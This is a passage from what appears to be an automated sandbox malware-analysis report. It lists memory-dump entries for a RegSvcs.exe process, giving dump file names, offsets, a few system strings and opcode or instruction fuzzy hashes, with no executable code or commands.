                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: GlobalTags
                                                                                                                              • API String ID: 0-1106856819
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: .mui
                                                                                                                              • API String ID: 0-1199573805
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: EXT-
                                                                                                                              • API String ID: 0-1948896318
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: BinaryHash
                                                                                                                              • API String ID: 0-2202222882
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: ym.
                                                                                                                              • API String ID: 0-3011085838
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: #
                                                                                                                              • API String ID: 0-1885708031
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: BinaryName
                                                                                                                              • API String ID: 0-215506332
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Strings
                                                                                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 014E895E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                                              • API String ID: 0-702105204
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6c42ca60f7c9334980a4ebecfe9e6c31905679367575bed38d3c25c0e30dfd99
                                                                                                                              • Instruction ID: 1abf3f57a65f3b8e434e46c90c57e7c80abb1da8362bef48510e7140c5c2f51b
                                                                                                                              • Opcode Fuzzy Hash: 6c42ca60f7c9334980a4ebecfe9e6c31905679367575bed38d3c25c0e30dfd99
                                                                                                                              • Instruction Fuzzy Hash: 53E1A571508341CFC715CF28C090A6BBBE5FF99318F05896EE99987361D731E909CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7b85ba7a54726797d30e85c04cd86eeffab42c090d5f053ab81f4b6b92e2d54d
                                                                                                                              • Instruction ID: d68e3a8b5eefad22eef2ebb8db84369653450ec771fd3689eda147c1e6a9514d
                                                                                                                              • Opcode Fuzzy Hash: 7b85ba7a54726797d30e85c04cd86eeffab42c090d5f053ab81f4b6b92e2d54d
                                                                                                                              • Instruction Fuzzy Hash: 31D1E371A00207DBDB54DF6AC890ABB77A5FF64204F04462FED16DB2A2EB30D951CB61
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                              • Instruction ID: 9c51a561ed1eb3ee1d01704a6180edc30b65150e9a4c2ebb94f856024802890d
                                                                                                                              • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                                              • Instruction Fuzzy Hash: 47B18574A006069FDF24DF99C948EABBBF9FF94305F14446FAA42977A0DA34E905CB10
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                              • Instruction ID: 8be5c5a69e7db24b8c5dfe4604e9f6443ceb866e84b55cee3247b5dd862920e0
                                                                                                                              • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                                                                                                              • Instruction Fuzzy Hash: 35B127756056469FEB21CB68C960BBFBBF6AF85600F18015AE542DB3A1D730ED41CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e028c00a81804f02c6d41bdfc4797f172299da9de4e00aae393b185945707bd6
                                                                                                                              • Instruction ID: 988f4d065f37f3d581105d20c37fa2ad5750b0003009abeefc807aef0a53ec3b
                                                                                                                              • Opcode Fuzzy Hash: e028c00a81804f02c6d41bdfc4797f172299da9de4e00aae393b185945707bd6
                                                                                                                              • Instruction Fuzzy Hash: C5C14674108342CFD764CF19C494BABB7E4BF98708F44492EE989873A1E774E909CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f63d973b7154ba74ee190c73cbc465fe48d1f9715d94b8767e65a0d9cf494ce5
                                                                                                                              • Instruction ID: bedc2a8028da5a9266076468c326e78cb8ea19a9c2042408e86b3bb3f5099e56
                                                                                                                              • Opcode Fuzzy Hash: f63d973b7154ba74ee190c73cbc465fe48d1f9715d94b8767e65a0d9cf494ce5
                                                                                                                              • Instruction Fuzzy Hash: C8B19670A002698BDB75CF59C880BA9B3F5EF54704F1485EAD90AEB351DB709D86CB20
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 52d278ccdd76786216b6481481c3321e8a12e576ec8679e0d4051ba64e710561
                                                                                                                              • Instruction ID: 8fcb29e4185bef0db7bd8acceb5e17625fdb6f4c83ccb677b8887820f4ae5eb0
                                                                                                                              • Opcode Fuzzy Hash: 52d278ccdd76786216b6481481c3321e8a12e576ec8679e0d4051ba64e710561
                                                                                                                              • Instruction Fuzzy Hash: DFA10635E00655AFEB21EB5CC844BAEBBB5BB00B14F05012BEA11BB3B1D7789D45CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 77d66f7ebaa88d1d0497581e4f4c5c9b7e659043461420a291219c3611a74d3f
                                                                                                                              • Instruction ID: 4c75f95bb86bbf00d29b2a517a0767105d60a40416c882b0a8e2d805a8270590
                                                                                                                              • Opcode Fuzzy Hash: 77d66f7ebaa88d1d0497581e4f4c5c9b7e659043461420a291219c3611a74d3f
                                                                                                                              • Instruction Fuzzy Hash: 9AA1B271B017169BDB25DF69C5A0BAAB7A1FF64314F41402BEA05DB3A2DB34E812CB50
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 579793feb81d2c4740a09d47893dcb4f0a4f5c6b4cd67d827d8997d7c6586b0a
                                                                                                                              • Instruction ID: 7dc4e44b1443b859191fa1415ec16b6b7a2da4b1c047e98bba3c840f4aa23ee9
                                                                                                                              • Opcode Fuzzy Hash: 579793feb81d2c4740a09d47893dcb4f0a4f5c6b4cd67d827d8997d7c6586b0a
                                                                                                                              • Instruction Fuzzy Hash: 78A1CD72A04252DFC722DF28C980B6ABBE9FF98704F45092DE5459F661D334ED01CB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                              • Instruction ID: ac4c74d110c30e5c9e59f75bcddb14e0bafa89919e619aef15286dd7146a90ee
                                                                                                                              • Opcode Fuzzy Hash: 6ce3715ed4799cd0a993ea830d382c3077ea0590534c70b07cf682ff4d409637
                                                                                                                              • Instruction Fuzzy Hash: FCB11A71E00A1ADFDF19CFADC880AADB7B5FF98310F148569E915AB354D730A941CBA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 72eb35159e91e4bfad985de986b325fb6457fc1c9a85366e4f8dc617e4f8d11a
                                                                                                                              • Instruction ID: afe0c1f5fcd2fb46c218068e661b29dadb1c6d67e8e638b2d57ede9ee044e72d
                                                                                                                              • Opcode Fuzzy Hash: 72eb35159e91e4bfad985de986b325fb6457fc1c9a85366e4f8dc617e4f8d11a
                                                                                                                              • Instruction Fuzzy Hash: 3691C371D00216AFDF11DF69D888BBEBFF5AF68311F16416AE610AB361D734D9009BA0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0215e50a902af8ea898f48bb5bea6ad780df7637f477f954e73b6437e722027f
                                                                                                                              • Instruction ID: 46a1e9ce1683097c968b5cdd3c07e3ed0ecfc39666083077c9520fe4aa255e3e
                                                                                                                              • Opcode Fuzzy Hash: 0215e50a902af8ea898f48bb5bea6ad780df7637f477f954e73b6437e722027f
                                                                                                                              • Instruction Fuzzy Hash: 7E914435A00616DBEB24DB69C440BFA7BA1FF94B14F0542ABE905AB370E734D902C7A1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              • Instruction ID: a358ed77f9b575b8865b2d019bcccdb4b8268ebf8a66b964e673af5b6d5df3ad
                                                                                                                              • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                                                                                              • Instruction Fuzzy Hash: 3751C631D0020AAFDF21DA95C888BAFBBF9AB10326F11466BD611772B1D7709E45C7A0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 0d83fcdcb84d992a252c20acc4afdddcf01744aab2ccb434ea27269d90931572
                                                                                                                              • Instruction ID: 5e329d2632647b975d597d20901148dc678e73b5a5ec24d55bbb278700fe94bf
                                                                                                                              • Opcode Fuzzy Hash: 0d83fcdcb84d992a252c20acc4afdddcf01744aab2ccb434ea27269d90931572
                                                                                                                              • Instruction Fuzzy Hash: DF41F6727016229BD729DB6DC894B7FBBDAFF92220F088619F9559F2C0D734D801C691
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b3f5b615c03a3dc728d9c57c2b4d609de0826aa56b9705873332faf3f0211ad0
                                                                                                                              • Instruction ID: ace029c160fa0a84641c165c84cdbc7ff9d4d32c9dc3126a5a76a36b89b701e2
                                                                                                                              • Opcode Fuzzy Hash: b3f5b615c03a3dc728d9c57c2b4d609de0826aa56b9705873332faf3f0211ad0
                                                                                                                              • Instruction Fuzzy Hash: 3A51BA7290021ADFCB20DFA9C8D4DAFBBF9FF58255B51451AD516A7310D732AD02CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 67b334d56ca61937d9e660e71023c593e78bd6c71450254fdf1396d898056427
                                                                                                                              • Instruction ID: 5051e61fa5e6083f83f522331925a38a11fd7ede32b39d440c4ee16668d7d40e
                                                                                                                              • Opcode Fuzzy Hash: 67b334d56ca61937d9e660e71023c593e78bd6c71450254fdf1396d898056427
                                                                                                                              • Instruction Fuzzy Hash: 37414671740302DBCF25EF6A98A0F6A3B64EB24758F52002FED0A9F271D7B59805C791
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                              • Instruction ID: 323ff72ae12d69fe8cf9d07de8d510aea763150c74d796997e5f28a4c76e8f7d
                                                                                                                              • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                                                                                                                              • Instruction Fuzzy Hash: 1841E8336007269FD725CF68C984A6EB7E9FF91210B05462EE9528FA80EB70ED04C7D0
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: e3e9057c5f23fa5c38f11eb055571adcbb0446eb653563b9e5921256a29588f3
                                                                                                                              • Instruction ID: b2586b10590781c568d6125b72c85c52d6d9a7c5af45411c219a2471683ca823
                                                                                                                              • Opcode Fuzzy Hash: e3e9057c5f23fa5c38f11eb055571adcbb0446eb653563b9e5921256a29588f3
                                                                                                                              • Instruction Fuzzy Hash: E4419C369002199BDF24DF99C440AEEBBB8BF58710F14816BF815E7360D7359D42CBA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 9ee2c689a7e1211a67fba8a9350e6fa79b271636e34c41aad3722e9276eb689e
                                                                                                                              • Instruction ID: 85e03ac9b985c73b122b7e5e46fadaa40ced73da9b717f4df1212b475c6c653d
                                                                                                                              • Opcode Fuzzy Hash: 9ee2c689a7e1211a67fba8a9350e6fa79b271636e34c41aad3722e9276eb689e
                                                                                                                              • Instruction Fuzzy Hash: B441E3716003029FD720EF29C884A6BB7E6FF98214F01482FE957D7321DB75E84A8B51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                              • Instruction ID: 696663246d61bebbcb4e34bad17e5389424f647a5fb7f7d8f8295d7b19dc8376
                                                                                                                              • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                                                                                                                              • Instruction Fuzzy Hash: B1515B75A00215CFDF15CF98C590AAEF7B2FF84724F2881AAD915A7361D770AE42CB90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 3fd8035d51892519802f92cf0363b98cccfaf2b270b3af2f5bff89562ec3a8e1
                                                                                                                              • Instruction ID: 0ded3aae885e868771941c95d35cb58ce2d9c3538025bcb9b1ab20b067af3641
                                                                                                                              • Opcode Fuzzy Hash: 3fd8035d51892519802f92cf0363b98cccfaf2b270b3af2f5bff89562ec3a8e1
                                                                                                                              • Instruction Fuzzy Hash: 28511674900256DFDB659B28CC00BE9BBB9FF21318F1542ABD5259B3E1D7345981CF41
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: f72bdc7778e96415fe7282c7caad8b0327461ad06513995ee7d68c81d0487f52
                                                                                                                              • Instruction ID: 57bb991bcdea0d3a632cfdcd32ac047c613680aa8566d8b530ba674011f9634b
                                                                                                                              • Opcode Fuzzy Hash: f72bdc7778e96415fe7282c7caad8b0327461ad06513995ee7d68c81d0487f52
                                                                                                                              • Instruction Fuzzy Hash: 7541A631A002299FDB21DF69C940BEE77B8EF94740F0500ABE908AB361D774DE81CB51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                              • Instruction ID: 045cd656970cb8d97e11bdb390245cd196721d8244ff2705d2dccca680815ba3
                                                                                                                              • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                              • Instruction Fuzzy Hash: 3F417577B00126ABDB15DFD9CC84AAFBBFABF99610F284069E5049B381D671DD01C760
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 128d6be69d55b8c4e65a35f4314242c0d06732f6add214e5ffe54bb4a3dc2ffa
                                                                                                                              • Instruction ID: 989b2ec91d65f3404d96641e813c817590594a27067a04083462582dcfd05ac4
                                                                                                                              • Opcode Fuzzy Hash: 128d6be69d55b8c4e65a35f4314242c0d06732f6add214e5ffe54bb4a3dc2ffa
                                                                                                                              • Instruction Fuzzy Hash: 1C41C2706007019FE325CF29C580A66B7FAFF59318B144A6FE55787B61E730E84ACB91
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a0cb9125957290fe2dfcc153e130b68a8ddef57256d45f2f45ccdb04af97e813
                                                                                                                              • Instruction ID: 75a3321305f4c495ecc412e829543dec591a596fc4a175e3f0c5b8868b2d4bf4
                                                                                                                              • Opcode Fuzzy Hash: a0cb9125957290fe2dfcc153e130b68a8ddef57256d45f2f45ccdb04af97e813
                                                                                                                              • Instruction Fuzzy Hash: 5341BE32900205CFDB21EF6CD4947EE7BB0BF54610F25016BD421AB3A5EBB49985DBA4
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000004.00000002.1351485811.0000000001430000.00000040.00001000.00020000.00000000.sdmp, Offset: 01430000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_4_2_1430000_RegSvcs.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 8a48a2c2731474f63c06017ecb88c7f4ddd3a7e6ff3e713ebb8932b9bf35e39f
